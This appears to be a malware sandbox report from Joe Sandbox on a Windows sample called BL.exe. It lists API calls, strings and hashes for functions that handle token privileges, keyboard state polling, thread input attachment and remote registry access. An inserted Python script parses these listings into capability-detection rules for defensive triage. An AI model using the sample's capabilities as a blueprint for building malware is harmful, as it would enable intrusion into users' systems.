                                                                                                                             • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: DestroyWindow
                                                                                                                            • String ID: static
                                                                                                                            • API String ID: 3375834691-2160076837
                                                                                                                            • Opcode ID: 88f11647011456fbb04f7235260bd1d02a964e72c1c4e3b3fb6640230c73d37f
                                                                                                                            • Instruction ID: 4605c95b1b006c90d65e271c0fdf07f62d21d56273c2870bf7f2e3decf5281c5
                                                                                                                            • Opcode Fuzzy Hash: 88f11647011456fbb04f7235260bd1d02a964e72c1c4e3b3fb6640230c73d37f
                                                                                                                            • Instruction Fuzzy Hash: 4531B572200300BBD7109B64DC45F6BB3A8EBC9711F204A2EFA50D72C0D7B4E8048B69
                                                                                                                            APIs
                                                                                                                            • GetCurrentProcess.KERNEL32(00000008,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00439409
                                                                                                                            • OpenThreadToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?), ref: 0043940C
                                                                                                                            • GetCurrentProcess.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?), ref: 0043941D
                                                                                                                            • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?), ref: 00439420
                                                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeAssignPrimaryTokenPrivilege,?), ref: 0043945B
                                                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeIncreaseQuotaPrivilege,?), ref: 00439474
                                                                                                                            • _memcmp.LIBCMT ref: 004394A9
                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004394F8
                                                                                                                            Strings
                                                                                                                            • SeIncreaseQuotaPrivilege, xrefs: 0043946A
                                                                                                                            • SeAssignPrimaryTokenPrivilege, xrefs: 00439455
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Process$CurrentLookupOpenPrivilegeTokenValue$CloseHandleThread_memcmp
                                                                                                                            • String ID: SeAssignPrimaryTokenPrivilege$SeIncreaseQuotaPrivilege
                                                                                                                            • API String ID: 1446985595-805462909
                                                                                                                            • Opcode ID: 7b5964ebc210eec24af21402e2b7f40e95def761f5b1447ed6d44f65f7ea18b7
                                                                                                                            • Instruction ID: 628aaead06b6f58e004e5b45c2ed9710a22b4d2b921ab75b424857e8fd72c9d6
                                                                                                                            • Opcode Fuzzy Hash: 7b5964ebc210eec24af21402e2b7f40e95def761f5b1447ed6d44f65f7ea18b7
                                                                                                                            • Instruction Fuzzy Hash: DB31A371508312ABC710DF21CD41AAFB7E8FB99704F04591EF98193240E7B8DD4ACBAA
                                                                                                                            APIs
                                                                                                                            • SetErrorMode.KERNEL32(00000001), ref: 0045D848
                                                                                                                            • GetDriveTypeW.KERNEL32(?,?), ref: 0045D8A3
                                                                                                                            • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D94A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorMode$DriveType
                                                                                                                            • String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown$HH
                                                                                                                            • API String ID: 2907320926-41864084
                                                                                                                            • Opcode ID: f2537af69be7bdfb8cd077d5fba63d09357e4425d7c4eca9e5473fe3d57dd33a
                                                                                                                            • Instruction ID: d4cab332979e247f8c2da9788294718902473fa09eb5ff996f03d25688ce9cbb
                                                                                                                            • Opcode Fuzzy Hash: f2537af69be7bdfb8cd077d5fba63d09357e4425d7c4eca9e5473fe3d57dd33a
                                                                                                                            • Instruction Fuzzy Hash: C7318B75A083008FC310EF65E48481EB7A1AFC8315F648D2FF945A7362C779D9068BAB
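The three API listings above (the drag-and-drop handler around 0046F55F, the token-privilege routine around 00439409, and the drive-type routine around 0045D848) are the raw evidence behind several of the report's signatures, so a practitioner usually wants to turn such listings into a reproducible check rather than eyeball them. The following is an added example, not Joe Sandbox code and not part of the original report: it parses the plugin's "APIs" bullet format into records and applies a few hand-written capability rules over them. The rule names and the rule table are my own assumptions; the one fact they rest on is that Microsoft documents SE_ASSIGNPRIMARYTOKEN_NAME and SE_INCREASE_QUOTA_NAME as the privileges a CreateProcessAsUser caller needs, which is why resolving exactly those two LUIDs after OpenProcessToken reads as "run a program as a different user" setup. The sample listings embedded in the block are copied from the report sections above.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# One "APIs" bullet from the Joe Sandbox IDA-plugin listing, for example:
#   • LookupPrivilegeValueW.ADVAPI32(00000000,SeAssignPrimaryTokenPrivilege,?), ref: 0043945B
#   • Part of subcall function 00456354: GetCursorPos.USER32(004A83D8), ref: 0045636A
#   • _memcmp.LIBCMT ref: 004394A9          (no argument list at all)
_API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\S+?)\.(?P<mod>[A-Z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass
class ApiCall:
    api: str
    module: str
    args: tuple
    ref: int                       # address of the call site
    subcall: Optional[int] = None  # callee the call really lives in, if it is a subcall line


def parse_api_lines(text: str) -> List[ApiCall]:
    """Turn one function's API listing into ApiCall records; non-API lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = _API_LINE.match(line)
        if not m:
            continue  # "APIs", "Strings", xrefs lines and so on
        args = tuple(a for a in (m.group("args") or "").split(",") if a)
        sub = m.group("sub")
        calls.append(ApiCall(m.group("api"), m.group("mod"), args,
                             int(m.group("ref"), 16), int(sub, 16) if sub else None))
    return calls


# Capability rules (assumed, hand-written): every (API name, required argument or None)
# pair must be satisfied by some call in the function for the rule to fire.
RULES = {
    "run-as setup (token privilege lookup)": [
        ("OpenProcessToken", None),
        ("LookupPrivilegeValueW", "SeAssignPrimaryTokenPrivilege"),
        ("LookupPrivilegeValueW", "SeIncreaseQuotaPrivilege"),
    ],
    "drive enumeration with error dialogs suppressed": [
        ("SetErrorMode", None),
        ("GetDriveTypeW", None),
    ],
    "drag-and-drop with keyboard/mouse polling": [
        ("GetAsyncKeyState", None),
        ("ReleaseCapture", None),
    ],
}


def match_rules(calls: List[ApiCall], include_subcalls: bool = True) -> List[str]:
    """Names of every rule whose conditions are all met; optionally ignore subcall lines."""
    hits = []
    for name, conds in RULES.items():
        if all(any(c.api == api and (needle is None or needle in c.args)
                   and (include_subcalls or c.subcall is None) for c in calls)
               for api, needle in conds):
            hits.append(name)
    return hits


# Listings copied from the report's APIs sections (functions near 00439409, 0045D848, 0046F55F).
PRIV_LISTING = """APIs
• GetCurrentProcess.KERNEL32(00000008,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00439409
• OpenThreadToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?), ref: 0043940C
• GetCurrentProcess.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?), ref: 0043941D
• OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?), ref: 00439420
• LookupPrivilegeValueW.ADVAPI32(00000000,SeAssignPrimaryTokenPrivilege,?), ref: 0043945B
• LookupPrivilegeValueW.ADVAPI32(00000000,SeIncreaseQuotaPrivilege,?), ref: 00439474
• _memcmp.LIBCMT ref: 004394A9
• CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004394F8
Strings
• SeIncreaseQuotaPrivilege, xrefs: 0043946A
"""
DRIVE_LISTING = """• SetErrorMode.KERNEL32(00000001), ref: 0045D848
• GetDriveTypeW.KERNEL32(?,?), ref: 0045D8A3
• SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D94A
"""
DRAG_LISTING = """  • Part of subcall function 00456354: GetCursorPos.USER32(004A83D8), ref: 0045636A
  • Part of subcall function 00456354: ScreenToClient.USER32(004A83D8,?), ref: 0045638A
  • Part of subcall function 00456354: GetAsyncKeyState.USER32(?), ref: 004563D0
  • Part of subcall function 00456354: GetAsyncKeyState.USER32(?), ref: 004563DC
• DefDlgProcW.USER32(?,00000205,?,?,004A83D8,00000000,00000001,004A83D8,?), ref: 0046F55F
• ImageList_DragLeave.COMCTL32(00000000,004A83D8,00000000,00000001,004A83D8,?), ref: 0046F57D
• ImageList_EndDrag.COMCTL32 ref: 0046F583
• ReleaseCapture.USER32 ref: 0046F589
• SetWindowTextW.USER32(?,00000000), ref: 0046F620
• SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0046F630
"""

if __name__ == "__main__":
    for label, listing in (("00439409", PRIV_LISTING), ("0045D848", DRIVE_LISTING),
                           ("0046F55F", DRAG_LISTING)):
        calls = parse_api_lines(listing)
        print(f"function near {label}: {len(calls)} calls -> {match_rules(calls) or ['no rule']}")
```

The `include_subcalls` switch matters when triaging: the plugin folds a callee's calls into the caller's listing ("Part of subcall function ..."), so a rule that fires only through subcall lines is attributing behaviour to a helper, not to the function whose hashes are printed. Rules are deliberately conjunctive over a single function's listing; a match across the whole report would be far noisier, since GetDriveTypeW or SetErrorMode on their own are unremarkable.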
                                                                                                                            APIs
                                                                                                                            • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 004672E6
                                                                                                                            • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 0046735D
                                                                                                                            • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 00467375
                                                                                                                            • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 004673ED
                                                                                                                            • SafeArrayGetVartype.OLEAUT32(CE8B7824,?), ref: 00467418
                                                                                                                            • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 00467445
                                                                                                                            • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 0046746A
                                                                                                                            • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 00467559
                                                                                                                            • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 0046748A
                                                                                                                              • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                                                              • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                                                              • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                                                                            • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 00467571
                                                                                                                            • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 004675E4
                                                                                                                              • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ArraySafe$Data$AccessUnaccess$Exception@8ThrowVartype_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1932665248-0
                                                                                                                            • Opcode ID: d6f42339ab3fa264365351f6c7f9bc6fbbd6feac36c871de3410b7a81864ab05
                                                                                                                            • Instruction ID: 42a0e90c8bf2b482c85e144861ec280134e9fb1dbd9e00a0d693b148f8e5f150
                                                                                                                            • Opcode Fuzzy Hash: d6f42339ab3fa264365351f6c7f9bc6fbbd6feac36c871de3410b7a81864ab05
                                                                                                                            • Instruction Fuzzy Hash: E8B1BF752082009FD304DF29C884B6B77E5FF98318F14496EE98587362E779E885CB6B
APIs
• SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00448182
• SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00448185
• GetWindowLongW.USER32(?,000000F0), ref: 004481A7
• _memset.LIBCMT ref: 004481BA
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481CC
• SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 0044824E
• SendMessageW.USER32(?,00001074,?,00000007), ref: 004482A4
• SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482BE
• SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482E3
• SendMessageW.USER32(?,0000101E,00000001,00000000), ref: 004482FC
• SendMessageW.USER32(?,00001008,?,00000007), ref: 00448317
Memory Dump Source
• Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_BL.jbxd
Similarity
• API ID: MessageSend$LongWindow_memset
• String ID:
• API String ID: 830647256-0
APIs
  • Part of subcall function 0043343D: InvalidateRect.USER32(?,00000000,00000001), ref: 004334BE
• DestroyAcceleratorTable.USER32(?), ref: 0046EA9F
• ImageList_Destroy.COMCTL32(?), ref: 0046EB04
• ImageList_Destroy.COMCTL32(?), ref: 0046EB18
• ImageList_Destroy.COMCTL32(?), ref: 0046EB24
• DeleteObject.GDI32(003D0000), ref: 0046EB4F
• DestroyIcon.USER32(004E0045), ref: 0046EB67
• DeleteObject.GDI32(95257051), ref: 0046EB7F
• DestroyWindow.USER32(00550000), ref: 0046EB97
• DestroyIcon.USER32(?), ref: 0046EBBF
• DestroyIcon.USER32(?), ref: 0046EBCD
Similarity
• API ID: Destroy$IconImageList_$DeleteObject$AcceleratorInvalidateRectTableWindow
• String ID:
• API String ID: 802431696-0
APIs
• GetKeyboardState.USER32(?,?,?), ref: 00444D8A
• GetAsyncKeyState.USER32(000000A0), ref: 00444E0F
• GetKeyState.USER32(000000A0), ref: 00444E26
• GetAsyncKeyState.USER32(000000A1), ref: 00444E40
• GetKeyState.USER32(000000A1), ref: 00444E51
• GetAsyncKeyState.USER32(00000011), ref: 00444E69
• GetKeyState.USER32(00000011), ref: 00444E77
• GetAsyncKeyState.USER32(00000012), ref: 00444E8F
• GetKeyState.USER32(00000012), ref: 00444E9D
• GetAsyncKeyState.USER32(0000005B), ref: 00444EB5
• GetKeyState.USER32(0000005B), ref: 00444EC3
Similarity
• API ID: State$Async$Keyboard
• String ID:
• API String ID: 541375521-0
Strings
Similarity
• API ID:
• String ID: HH
• API String ID: 0-2761332787
APIs
• SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004508CB
• SendMessageW.USER32(?,00001036,00000000,?), ref: 004508DB
• SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,00001036,00000000,?,000000FF,?,SysListView32,004848E8,00000000), ref: 004508FC
• _wcslen.LIBCMT ref: 00450944
• _wcscat.LIBCMT ref: 00450955
• SendMessageW.USER32(?,00001057,00000000,?), ref: 0045096C
• SendMessageW.USER32(?,00001061,?,?), ref: 0045099B
Strings
Similarity
• API ID: MessageSend$Window_wcscat_wcslen
• String ID: -----$SysListView32
• API String ID: 4008455318-3975388722
APIs
• _memset.LIBCMT ref: 00448625
• CreateMenu.USER32 ref: 0044863C
• SetMenu.USER32(?,00000000), ref: 0044864C
• GetMenuItemInfoW.USER32(?,?,00000000,004A83D8), ref: 004486D6
• IsMenu.USER32(?), ref: 004486EB
• CreatePopupMenu.USER32 ref: 004486F5
• InsertMenuItemW.USER32(?,?,00000001,004A83D8), ref: 00448739
• DrawMenuBar.USER32 ref: 00448742
Strings
Similarity
• API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
• String ID: 0
• API String ID: 176399719-4108050209
APIs
  • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
• SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469277
• GetDlgCtrlID.USER32(00000000), ref: 00469289
• GetParent.USER32 ref: 004692A4
• SendMessageW.USER32(00000000,?,00000111), ref: 004692A7
• GetDlgCtrlID.USER32(00000000), ref: 004692AE
• GetParent.USER32 ref: 004692C7
• SendMessageW.USER32(00000000,?,00000111,?), ref: 004692CA
Strings
Similarity
• API ID: MessageSend$CtrlParent$_wcslen
• String ID: ComboBox$ListBox
• API String ID: 2040099840-1403004172
                                                                                                                            • Opcode ID: d7a46b5f720fef199203ad69d051b39deebb3b2451f9d950c399d088bcf038a9
                                                                                                                            • Instruction ID: ef07326ddff4210f4741e87947fad3c2ec39ee11b6619cfdf8cc81125e1c6f8c
                                                                                                                            • Opcode Fuzzy Hash: d7a46b5f720fef199203ad69d051b39deebb3b2451f9d950c399d088bcf038a9
                                                                                                                            • Instruction Fuzzy Hash: BC21D6716002147BD600AB65CC45DBFB39CEB85324F044A1FF954A73D1DAB8EC0947B9
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                                            • SendMessageW.USER32(00000186,00000186,?,00000000), ref: 00469471
                                                                                                                            • GetDlgCtrlID.USER32(00000000), ref: 00469483
                                                                                                                            • GetParent.USER32 ref: 0046949E
                                                                                                                            • SendMessageW.USER32(00000000,?,00000111), ref: 004694A1
                                                                                                                            • GetDlgCtrlID.USER32(00000000), ref: 004694A8
                                                                                                                            • GetParent.USER32 ref: 004694C1
                                                                                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 004694C4
                                                                                                                            Strings
Similarity
• API ID: MessageSend$CtrlParent$_wcslen
• String ID: ComboBox$ListBox
• API String ID: 2040099840-1403004172
• Opcode ID: 2e10f5a1695edfae3743bbe69767f09e04e95ab32c83142982b04f1cb5eb07ed
• Instruction ID: 434b10a17d45167e777e8ea6e726dd6ee4e01267e4a119798c8aa60e835c5cdc
• Opcode Fuzzy Hash: 2e10f5a1695edfae3743bbe69767f09e04e95ab32c83142982b04f1cb5eb07ed
• Instruction Fuzzy Hash: CA21D7756002147BD600BB29CC45EBFB39CEB85314F04492FF984A7291EABCEC0A4779
APIs
  • Part of subcall function 004419ED: DeleteObject.GDI32(?), ref: 00441A53
• SendMessageW.USER32(769523D0,00001001,00000000,00000000), ref: 00448E73
• SendMessageW.USER32(769523D0,00001026,00000000,00000000), ref: 00448E7E
  • Part of subcall function 00441A7A: CreateSolidBrush.GDI32 ref: 00441ACB
Similarity
• API ID: MessageSend$BrushCreateDeleteObjectSolid
• String ID:
• API String ID: 3771399671-0
• Opcode ID: 51f09a1d655476e15b4ab454a85655f186203ac899921849c361721d54d31972
• Instruction ID: ebbecaf0548398ae771b9aa28ebf0b72f134f9ffbbfb28b2279bd799396bd9e3
• Opcode Fuzzy Hash: 51f09a1d655476e15b4ab454a85655f186203ac899921849c361721d54d31972
• Instruction Fuzzy Hash: F4510930208300AFE2209F25DD85F6F77EAEB85B14F14091EF994E72D0CBB9E9458769
APIs
Similarity
• API ID: InitVariant$_malloc_wcscpy_wcslen
• String ID:
• API String ID: 3413494760-0
• Opcode ID: 44a1e819814e3f0b97ca16996dc1dc3eb402023cf38fd38a03f085344c042abe
• Instruction ID: 77b59fa0745152fd1b6386ccdd9ca850b9b7f4abb66e551d88b584249de3d357
• Opcode Fuzzy Hash: 44a1e819814e3f0b97ca16996dc1dc3eb402023cf38fd38a03f085344c042abe
• Instruction Fuzzy Hash: F83150B2600746AFC714DF7AC880996FBA8FF88310B44892EE64983641D735F554CBA5
APIs
• GetCurrentThreadId.KERNEL32 ref: 004377D7
• GetForegroundWindow.USER32(00000000,?,?,?,?,0045FDE0,?,?,00000001), ref: 004377EB
• GetWindowThreadProcessId.USER32(00000000), ref: 004377F8
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,0045FDE0,?,?,00000001), ref: 00437809
• GetWindowThreadProcessId.USER32(?,00000001), ref: 00437819
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,0045FDE0,?,?,00000001), ref: 0043782E
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,0045FDE0,?,?,00000001), ref: 0043783D
• AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,0045FDE0,?,?,00000001), ref: 0043788D
• AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,0045FDE0,?,?,00000001), ref: 004378A1
• AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,0045FDE0,?,?,00000001), ref: 004378AC
Similarity
• API ID: Thread$AttachInput$Window$Process$CurrentForeground
• String ID:
• API String ID: 2156557900-0
• Opcode ID: f5203a8e23f024bead7fa0256802a4b49a7a8dce25e7908e04b44143f6d1477f
• Instruction ID: cf5237ead9178137421241ba4763476990ac919c12b5de4495d1c20f4e3090f4
• Opcode Fuzzy Hash: f5203a8e23f024bead7fa0256802a4b49a7a8dce25e7908e04b44143f6d1477f
• Instruction Fuzzy Hash: B0316FB1504341AFD768EF28DC88A7BB7A9EF9D310F14182EF44197250D7B89C44CB69
APIs
Strings
Similarity
• API ID: __wcsicoll
• String ID: 0%d$DOWN$OFF
• API String ID: 3832890014-468733193
• Opcode ID: b886d43e96c57de01ffb669c6ba173cdd7012b944398daffbb17888043fd80c7
• Instruction ID: 3901981f80fa7430cd77b89167089bc3925961a07aad88d0cc2f25a35af8916b
• Opcode Fuzzy Hash: b886d43e96c57de01ffb669c6ba173cdd7012b944398daffbb17888043fd80c7
• Instruction Fuzzy Hash: B7F1D8614083856DEB21EB21C845BAF7BE85F95309F08092FF98212193D7BCD68DC76B
APIs
• VariantInit.OLEAUT32(00000000), ref: 0045E959
• VariantCopy.OLEAUT32(00000000), ref: 0045E963
• VariantClear.OLEAUT32 ref: 0045E970
• VariantTimeToSystemTime.OLEAUT32 ref: 0045EAEB
• __swprintf.LIBCMT ref: 0045EB1F
• VarR8FromDec.OLEAUT32(?,?), ref: 0045EB61
• VariantInit.OLEAUT32(00000000), ref: 0045EBE7
Strings
• %4d%02d%02d%02d%02d%02d, xrefs: 0045EB19
Similarity
• API ID: Variant$InitTime$ClearCopyFromSystem__swprintf
• String ID: %4d%02d%02d%02d%02d%02d
• API String ID: 43541914-1568723262
• Opcode ID: a91a6a11b3d6cf138c07060a726a6bd632cc840ea6057b3ca397e6bb9963c38f
• Instruction ID: db8708ae94f177a13b26e6bf0e0b18ed2eb17208bc27bd00c320e315e6f9d40a
• Opcode Fuzzy Hash: a91a6a11b3d6cf138c07060a726a6bd632cc840ea6057b3ca397e6bb9963c38f
• Instruction Fuzzy Hash: ABC1F4BB1006019BC704AF06D480666F7A1FFD4322F14896FED984B341DB3AE95ED7A6
APIs
• InterlockedDecrement.KERNEL32(004A7CAC), ref: 0042FE66
• Sleep.KERNEL32(0000000A), ref: 0042FE6E
• InterlockedDecrement.KERNEL32(004A7CAC), ref: 0042FF5D
Strings
                                                                                                                            Similarity
                                                                                                                            • API ID: DecrementInterlocked$Sleep
                                                                                                                            • String ID: 0vH$0vH$4RH0vH$@COM_EVENTOBJ
                                                                                                                            • API String ID: 2250217261-3412429629
Strings
Memory Dump Source
• Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_BL.jbxd
Similarity
• API ID:
• String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
• API String ID: 0-1603158881
APIs
• _memset.LIBCMT ref: 00479D1F
• VariantInit.OLEAUT32(?), ref: 00479F06
• VariantClear.OLEAUT32(?), ref: 00479F11
• VariantInit.OLEAUT32(?), ref: 00479DF7
  • Part of subcall function 00467626: VariantInit.OLEAUT32(00000000), ref: 00467666
  • Part of subcall function 00467626: VariantCopy.OLEAUT32(00000000,00479BD3), ref: 00467670
  • Part of subcall function 00467626: VariantClear.OLEAUT32 ref: 0046767D
• VariantClear.OLEAUT32(?), ref: 00479F9C
  • Part of subcall function 004781AE: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
  • Part of subcall function 004781AE: VariantCopy.OLEAUT32(?,?), ref: 00478259
  • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
  • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000078,?), ref: 00478287
Strings
Similarity
• API ID: Variant$Copy$ClearInit$ErrorLast_memset
• String ID: F$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
• API String ID: 665237470-60002521
APIs
• mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D5A
• DestroyWindow.USER32(?), ref: 0042A751
• UnregisterHotKey.USER32(?), ref: 0042A778
• FreeLibrary.KERNEL32(?), ref: 0042A822
• VirtualFree.KERNEL32(?,00000000,00008000), ref: 0042A854
Strings
Similarity
• API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
• String ID: close all$#v
• API String ID: 4174999648-3101823635
APIs
  • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046A84D
Strings
Similarity
• API ID: ConnectRegistry_wcslen
• String ID: HH
• API String ID: 535477410-2761332787
APIs
• _memset.LIBCMT ref: 0045F317
• GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0045F367
• IsMenu.USER32(?), ref: 0045F380
• CreatePopupMenu.USER32 ref: 0045F3C5
• GetMenuItemCount.USER32(?), ref: 0045F42F
• InsertMenuItemW.USER32(?,?,00000001,?), ref: 0045F45B
Strings
Similarity
• API ID: Menu$Item$CountCreateInfoInsertPopup_memset
• String ID: 0$2
• API String ID: 3311875123-3793063076
APIs
• GetModuleHandleW.KERNEL32(00000000,004A8E80,00000100,00000100,?,C:\Users\user\Desktop\BL.exe), ref: 0043719E
• LoadStringW.USER32(00000000), ref: 004371A7
• GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 004371BD
• LoadStringW.USER32(00000000), ref: 004371C0
• _printf.LIBCMT ref: 004371EC
• MessageBoxW.USER32(00000000,?,?,00011010), ref: 00437208
Strings
• C:\Users\user\Desktop\BL.exe, xrefs: 00437189
• %s (%d) : ==> %s: %s %s, xrefs: 004371E7
Similarity
• API ID: HandleLoadModuleString$Message_printf
• String ID: %s (%d) : ==> %s: %s %s$C:\Users\user\Desktop\BL.exe
• API String ID: 220974073-17324339
APIs
